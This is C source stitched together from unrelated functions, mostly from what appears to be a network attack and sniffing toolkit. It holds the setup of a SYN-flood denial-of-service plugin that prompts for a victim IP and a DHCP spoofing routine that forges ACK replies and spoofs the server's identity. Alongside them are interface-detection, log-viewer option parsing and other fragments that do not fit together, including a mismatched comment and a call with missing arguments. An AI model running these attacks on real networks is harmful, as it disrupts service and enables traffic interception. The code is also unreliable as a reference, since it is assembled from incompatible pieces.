static int dos_attack_init(void *dummy)
{
struct in_addr ipaddr;
char dos_addr[MAX_ASCII_ADDR_LEN];
char unused_addr[MAX_ASCII_ADDR_LEN];
struct port_list *p;
/* It doesn't work if unoffensive */
if (GBL_OPTIONS->unoffensive) {
INSTANT_USER_MSG("dos_attack: plugin doesn't work in UNOFFENSIVE mode\n");
return PLUGIN_FINISHED;
}
/* don't show packets while operating */
GBL_OPTIONS->quiet = 1;
memset(dos_addr, 0, sizeof(dos_addr));
memset(unused_addr, 0, sizeof(dos_addr));
ui_input("Insert victim IP: ", dos_addr, sizeof(dos_addr), NULL);
if (inet_aton(dos_addr, &ipaddr) == 0) {
INSTANT_USER_MSG("dos_attack: Invalid IP address.\n");
return PLUGIN_FINISHED;
}
ip_addr_init(&victim_host, AF_INET, (char *)&ipaddr);
ui_input("Insert unused IP: ", unused_addr, sizeof(unused_addr), NULL);
if (inet_aton(unused_addr, &ipaddr) == 0) {
INSTANT_USER_MSG("dos_attack: Invalid IP address.\n");
return PLUGIN_FINISHED;
}
ip_addr_init(&fake_host, AF_INET, (char *)&ipaddr);
INSTANT_USER_MSG("dos_attack: Starting scan against %s [Fake Host: %s]\n", dos_addr, unused_addr);
/* Delete the "open" port list just in case of previous executions */
while (!SLIST_EMPTY(&port_table)) {
p = SLIST_FIRST(&port_table);
SLIST_REMOVE_HEAD(&port_table, next);
SAFE_FREE(p);
}
/* Add the hook to "create" the fake host */
hook_add(HOOK_PACKET_ARP_RQ, &parse_arp);
/* Add the hook for SYN-ACK reply */
hook_add(HOOK_PACKET_TCP, &parse_tcp);
/* create the flooding thread */
ec_thread_new("golem", "SYN flooder thread", &syn_flooder, NULL);
return PLUGIN_RUNNING;
}
static void parse_icmp6(struct packet_object *po)
{
struct ip_addr ip;
ip_addr_init(&ip, AF_INET6, po->L4.options);
if(!ip_addr_cmp(&fake_host, &ip))
send_icmp6_nadv(&fake_host, &po->L3.src, GBL_IFACE->mac, 0);
}
void match_user_ip_add(char *value, char *tag)
{
struct in_addr ip;
/* transform the target string into ip_addr struct */
if (inet_pton(AF_INET, value, &ip) <= 0) {
DEBUG_MSG(D_ERROR, "Invalid STATIC-IP %s in %s", value, GBL_CONF->redirected_users);
} else {
struct ip_addr uip;
struct timeval tv;
/* fill the values */
ip_addr_init(&uip, AF_INET, (u_char *)&ip);
/* null end_time means there is no timeout */
memset(&tv, 0, sizeof(struct timeval));
/*
* static-ip users are ALWAYS considered active.
* that's all.
* the hook to the IP level will trigger the tagging
*/
active_user_add(&uip, NULL, tag, tv);
}
}
/* Reply to requests for our fake host */
static void parse_arp(struct packet_object *po)
{
struct ip_addr sa;
ip_addr_init(&sa, AF_INET, (char *)&(fake_ip.s_addr));
if (!ip_addr_cmp(&sa, &po->L3.dst))
send_arp(ARPOP_REPLY, &sa, GBL_IFACE->mac, &po->L3.src, po->L2.src);
}
/*
* Find the right address to reply
*/
static struct ip_addr *dhcp_addr_reply(struct ip_addr *radd)
{
static struct ip_addr broad_addr;
u_int32 broad_int32 = 0xffffffff;
ip_addr_init(&broad_addr, AF_INET, (u_char *)&broad_int32);
/* check if the source is 0.0.0.0 */
if ( ip_addr_is_zero(radd) )
return &broad_addr;
return radd;
}
void get_hw_info(void)
{
u_long ip;
struct libnet_ether_addr *ea;
bpf_u_int32 network, netmask;
char pcap_errbuf[PCAP_ERRBUF_SIZE];
/* dont touch the interface reading from file */
if (!GBL_LNET->lnet || GBL_OPTIONS->read) {
DEBUG_MSG("get_hw_info: skipping... (not initialized)");
return;
}
DEBUG_MSG("get_hw_info");
/* get the ip address */
ip = libnet_get_ipaddr4(GBL_LNET->lnet);
/* if ip is equal to -1 there was an error */
if (ip != (u_long)~0) {
/* the interface has an ip address */
if (ip != 0)
GBL_IFACE->configured = 1;
/* save the ip address */
ip_addr_init(&GBL_IFACE->ip, AF_INET, (char *)&ip);
if (pcap_lookupnet(GBL_OPTIONS->iface, &network, &netmask, pcap_errbuf) == -1)
ERROR_MSG("%s", pcap_errbuf);
ip_addr_init(&GBL_IFACE->network, AF_INET, (char *)&network);
/* the user has specified a different netmask, use it */
if (GBL_OPTIONS->netmask) {
struct in_addr net;
/* sanity check */
if (inet_aton(GBL_OPTIONS->netmask, &net) == 0)
FATAL_ERROR("Invalid netmask %s", GBL_OPTIONS->netmask);
ip_addr_init(&GBL_IFACE->netmask, AF_INET, (char *)&net);
} else
ip_addr_init(&GBL_IFACE->netmask, AF_INET, (char *)&netmask);
} else
DEBUG_MSG("get_hw_info: NO IP on %s", GBL_OPTIONS->iface);
/* get the mac address */
ea = libnet_get_hwaddr(GBL_LNET->lnet);
if (ea != NULL)
memcpy(GBL_IFACE->mac, ea->ether_addr_octet, MEDIA_ADDR_LEN);
else
DEBUG_MSG("get_hw_info: NO MAC for %s", GBL_OPTIONS->iface);
/* get the MTU */
GBL_IFACE->mtu = get_iface_mtu(GBL_OPTIONS->iface);
/* check the mtu */
if (GBL_IFACE->mtu > INT16_MAX)
FATAL_ERROR("MTU too large");
USER_MSG("%6s ->\t%s ", GBL_OPTIONS->iface,
mac_addr_ntoa(GBL_IFACE->mac, pcap_errbuf));
USER_MSG("%16s ", ip_addr_ntoa(&GBL_IFACE->ip, pcap_errbuf));
USER_MSG("%16s\n\n", ip_addr_ntoa(&GBL_IFACE->netmask, pcap_errbuf) );
/* if not in bridged sniffing, return */
if (GBL_SNIFF->type != SM_BRIDGED)
return;
ip = libnet_get_ipaddr4(GBL_LNET->lnet_bridge);
/* if ip is equal to -1 there was an error */
if (ip != (u_long)~0) {
ip_addr_init(&GBL_BRIDGE->ip, AF_INET, (char *)&ip);
if (pcap_lookupnet(GBL_OPTIONS->iface_bridge, &network, &netmask, pcap_errbuf) == -1)
ERROR_MSG("%s", pcap_errbuf);
ip_addr_init(&GBL_BRIDGE->network, AF_INET, (char *)&network);
ip_addr_init(&GBL_BRIDGE->netmask, AF_INET, (char *)&netmask);
} else
DEBUG_MSG("get_hw_info: NO IP on %s", GBL_OPTIONS->iface_bridge);
ea = libnet_get_hwaddr(GBL_LNET->lnet_bridge);
if (ea != NULL)
memcpy(GBL_BRIDGE->mac, ea->ether_addr_octet, MEDIA_ADDR_LEN);
else
DEBUG_MSG("get_hw_info: NO MAC for %s", GBL_OPTIONS->iface_bridge);
/* get the MTU */
GBL_BRIDGE->mtu = get_iface_mtu(GBL_OPTIONS->iface_bridge);
if (GBL_BRIDGE->mtu > INT16_MAX)
FATAL_ERROR("MTU too large");
USER_MSG("%6s ->\t%s ", GBL_OPTIONS->iface_bridge,
mac_addr_ntoa(GBL_BRIDGE->mac, pcap_errbuf));
USER_MSG("%16s ", ip_addr_ntoa(&GBL_BRIDGE->ip, pcap_errbuf));
USER_MSG("%16s\n\n", ip_addr_ntoa(&GBL_BRIDGE->netmask, pcap_errbuf) );
/* some sanity checks */
if (GBL_BRIDGE->mtu != GBL_IFACE->mtu)
FATAL_ERROR("The two interfaces must have the same MTU.");
if (!memcmp(GBL_BRIDGE->mac, GBL_IFACE->mac, MEDIA_ADDR_LEN))
FATAL_ERROR("The two bridged interfaces must be phisically different");
}
void parse_options(int argc, char **argv)
{
int c;
struct in_addr ip;
static struct option long_options[] = {
{ "help", no_argument, NULL, 'h' },
{ "version", no_argument, NULL, 'v' },
{ "binary", no_argument, NULL, 'B' },
{ "hex", no_argument, NULL, 'X' },
{ "ascii", no_argument, NULL, 'A' },
{ "text", no_argument, NULL, 'T' },
{ "ebcdic", no_argument, NULL, 'E' },
{ "html", no_argument, NULL, 'H' },
{ "utf8", required_argument, NULL, 'U' },
{ "zero", no_argument, NULL, 'Z' },
{ "xml", no_argument, NULL, 'x' },
{ "analyze", no_argument, NULL, 'a' },
{ "connections", no_argument, NULL, 'c' },
{ "filter", required_argument, NULL, 'f' },
{ "filcon", required_argument, NULL, 'F' },
{ "no-headers", no_argument, NULL, 'n' },
{ "only-source", no_argument, NULL, 's' },
{ "only-dest", no_argument, NULL, 'd' },
{ "show-mac", no_argument, NULL, 'm' },
{ "show-client", no_argument, NULL, 'i' },
{ "color", no_argument, NULL, 'k' },
{ "reverse", no_argument, NULL, 'r' },
{ "proto", required_argument, NULL, 't' },
{ "only-local", required_argument, NULL, 'l' },
{ "only-remote", required_argument, NULL, 'L' },
{ "outfile", required_argument, NULL, 'o' },
{ "concat", no_argument, NULL, 'C' },
{ "decode", no_argument, NULL, 'D' },
{ "user", required_argument, NULL, 'u' },
{ "regex", required_argument, NULL, 'e' },
{ "passwords", no_argument, NULL, 'p' },
{ "client", required_argument, NULL, 'I' },
{ 0 , 0 , 0 , 0}
};
optind = 0;
while ((c = getopt_long (argc, argv, "AaBCcDdEe:F:f:HhiI:kLlmno:prsTt:U:u:vXxZ", long_options, (int *)0)) != EOF) {
switch (c) {
case 'a':
GBL.analyze = 1;
break;
case 'c':
GBL.connections = 1;
break;
case 'D':
GBL.connections = 1;
GBL.decode = 1;
NOT_IMPLEMENTED();
break;
case 'f':
target_compile(optarg);
break;
case 'F':
filcon_compile(optarg);
break;
case 's':
GBL.only_source = 1;
break;
case 'd':
GBL.only_dest = 1;
break;
case 'k':
GBL.color = 1;
break;
case 'r':
GBL.reverse = 1;
break;
case 't':
GBL_TARGET->proto = strdup(optarg);
break;
case 'n':
GBL.no_headers = 1;
break;
case 'm':
GBL.showmac = 1;
break;
case 'i':
GBL.showclient = 1;
break;
case 'I':
if (inet_aton(optarg, &ip) == 0) {
FATAL_ERROR("Invalid client ip address");
return;
}
ip_addr_init(&GBL.client, AF_INET, (u_char *)&ip);
break;
case 'l':
GBL.only_local = 1;
break;
case 'L':
GBL.only_remote = 1;
break;
case 'u':
GBL.user = strdup(optarg);
break;
case 'p':
GBL.passwords = 1;
break;
case 'e':
set_display_regex(optarg);
break;
case 'o':
GBL_LOGFILE = strdup(optarg);
break;
case 'C':
GBL.concat = 1;
break;
case 'B':
GBL.format = &bin_format;
break;
case 'X':
GBL.format = &hex_format;
break;
case 'A':
GBL.format = &ascii_format;
break;
case 'T':
GBL.format = &text_format;
break;
case 'E':
GBL.format = &ebcdic_format;
break;
case 'H':
GBL.format = &html_format;
break;
case 'U':
set_utf8_encoding((u_char*)optarg);
GBL.format = &utf8_format;
break;
case 'Z':
GBL.format = &zero_format;
break;
case 'x':
GBL.xml = 1;
break;
case 'h':
el_usage();
break;
case 'v':
printf("%s %s\n", GBL_PROGRAM, EC_VERSION);
exit(0);
break;
case ':': // missing parameter
fprintf(stdout, "\nTry `%s --help' for more options.\n\n", GBL_PROGRAM);
exit(0);
break;
case '?': // unknown option
fprintf(stdout, "\nTry `%s --help' for more options.\n\n", GBL_PROGRAM);
exit(0);
break;
}
}
/* file concatenation */
if (GBL.concat) {
if (argv[optind] == NULL)
FATAL_ERROR("You MUST specify at least one logfile");
/* this function does not return */
concatenate(optind, argv);
}
/* normal file operation */
if (argv[optind])
open_log(argv[optind]);
else
FATAL_ERROR("You MUST specify a logfile\n");
/* default to ASCII view */
if (GBL.format == NULL)
GBL.format = &ascii_format;
return;
}
void
rib_init(void) {
ip_addr_init();
arp_init();
route_init();
}
/*
* init the ICMP REDIRECT attack
*/
static int dhcp_spoofing_start(char *args)
{
struct in_addr ipaddr;
char *p;
int i = 1;
DEBUG_MSG("dhcp_spoofing_start");
if (!strcmp(args, ""))
SEMIFATAL_ERROR("DHCP spoofing needs a parameter.\n");
/*
* Check to see if sniff has started
*/
if (!GBL_SNIFF->active)
SEMIFATAL_ERROR("DHCP spoofing requires sniffing to be active.\n");
/* check the parameter:
*
* ip_pool/netmask/dns
*/
for (p = strsep(&args, "/"); p != NULL; p = strsep(&args, "/")) {
/* first parameter (the ip_pool) */
if (i == 1) {
char tmp[strlen(p)+4];
/* add the / to be able to use the target parsing function */
snprintf(tmp, strlen(p)+4, "/%s//", p);
if (compile_target(tmp, &dhcp_ip_pool) != ESUCCESS)
break;
/* second parameter (the netmask) */
} else if (i == 2) {
/* convert from string */
if (inet_aton(p, &ipaddr) == 0)
break;
/* get the netmask */
ip_addr_init(&dhcp_netmask, AF_INET, (u_char *)&ipaddr);
/* third parameter (the dns server) */
} else if (i == 3) {
char tmp[MAX_ASCII_ADDR_LEN];
/* convert from string */
if (inet_aton(p, &ipaddr) == 0)
break;
/* get the netmask */
ip_addr_init(&dhcp_dns, AF_INET, (u_char *)&ipaddr);
/* all the parameters were parsed correctly... */
USER_MSG("DHCP spoofing: using specified ip_pool, netmask %s", ip_addr_ntoa(&dhcp_netmask, tmp));
USER_MSG(", dns %s\n", ip_addr_ntoa(&dhcp_dns, tmp));
/* add the hookpoints */
hook_add(HOOK_PROTO_DHCP_REQUEST, dhcp_spoofing_req);
hook_add(HOOK_PROTO_DHCP_DISCOVER, dhcp_spoofing_disc);
/* create the options */
dhcp_setup_options();
/* se the pointer to the first ip pool address */
dhcp_free_ip = LIST_FIRST(&dhcp_ip_pool.ips);
return ESUCCESS;
}
i++;
}
/* error parsing the parameter */
SEMIFATAL_ERROR("DHCP spoofing: parameter number %d is incorrect.\n", i);
return -EFATAL;
}
/*
* parses the request and send the spoofed reply
*/
static void dhcp_spoofing_req(struct packet_object *po)
{
char dhcp_hdr[LIBNET_DHCPV4_H];
struct libnet_dhcpv4_hdr *dhcp;
u_int8 *options, *opt, *end;
struct ip_addr client, server;
char tmp[MAX_ASCII_ADDR_LEN];
DEBUG_MSG("dhcp_spoofing_req");
/* get a local copy of the dhcp header */
memcpy(dhcp_hdr, po->DATA.data, LIBNET_DHCPV4_H);
dhcp = (struct libnet_dhcpv4_hdr *)dhcp_hdr;
/* get the pointers to options */
options = po->DATA.data + LIBNET_DHCPV4_H;
end = po->DATA.data + po->DATA.len;
/* use the same dhcp header, but change the type of the message */
dhcp->dhcp_opcode = LIBNET_DHCP_REPLY;
/*
* if the client is requesting a particular IP address,
* release it. so we don't mess the network too much...
* only change the router ip ;)
*/
/* get the requested ip */
if ((opt = get_dhcp_option(DHCP_OPT_RQ_ADDR, options, end)) != NULL)
ip_addr_init(&client, AF_INET, opt + 1);
else {
/* search if the client already has the ip address */
if (dhcp->dhcp_cip != 0) {
ip_addr_init(&client, AF_INET, (u_char *)&dhcp->dhcp_cip);
} else
return;
}
/* set the requested ip */
dhcp->dhcp_yip = ip_addr_to_int32(&client.addr);
/* this is a dhcp ACK */
dhcp_options[2] = DHCP_ACK;
/*
* if it is a request after an offer from a server,
* spoof its ip to be stealth.
*/
if ((opt = get_dhcp_option(DHCP_OPT_SRV_ADDR, options, end)) != NULL) {
/* get the server id */
ip_addr_init(&server, AF_INET, opt + 1);
/* set it in the header */
dhcp->dhcp_sip = ip_addr_to_int32(&server.addr);
/* set it in the options */
ip_addr_cpy((u_char*)dhcp_options + 5, &server);
send_dhcp_reply(&server, dhcp_addr_reply(&po->L3.src), po->L2.src, (u_char*)dhcp_hdr, (u_char*)dhcp_options, dhcp_optlen);
} else {
/*
* the request does not contain an identifier,
* use our ip address
*/
dhcp->dhcp_sip = ip_addr_to_int32(&GBL_IFACE->ip.addr);
/* set it in the options */
ip_addr_cpy((u_char*)dhcp_options + 5, &GBL_IFACE->ip);
send_dhcp_reply(&GBL_IFACE->ip, dhcp_addr_reply(&po->L3.src), po->L2.src, (u_char*)dhcp_hdr, (u_char*)dhcp_options, dhcp_optlen);
}
USER_MSG("DHCP spoofing: fake ACK [%s] ", mac_addr_ntoa(po->L2.src, tmp));
USER_MSG("assigned to %s \n", ip_addr_ntoa(&client, tmp));
}
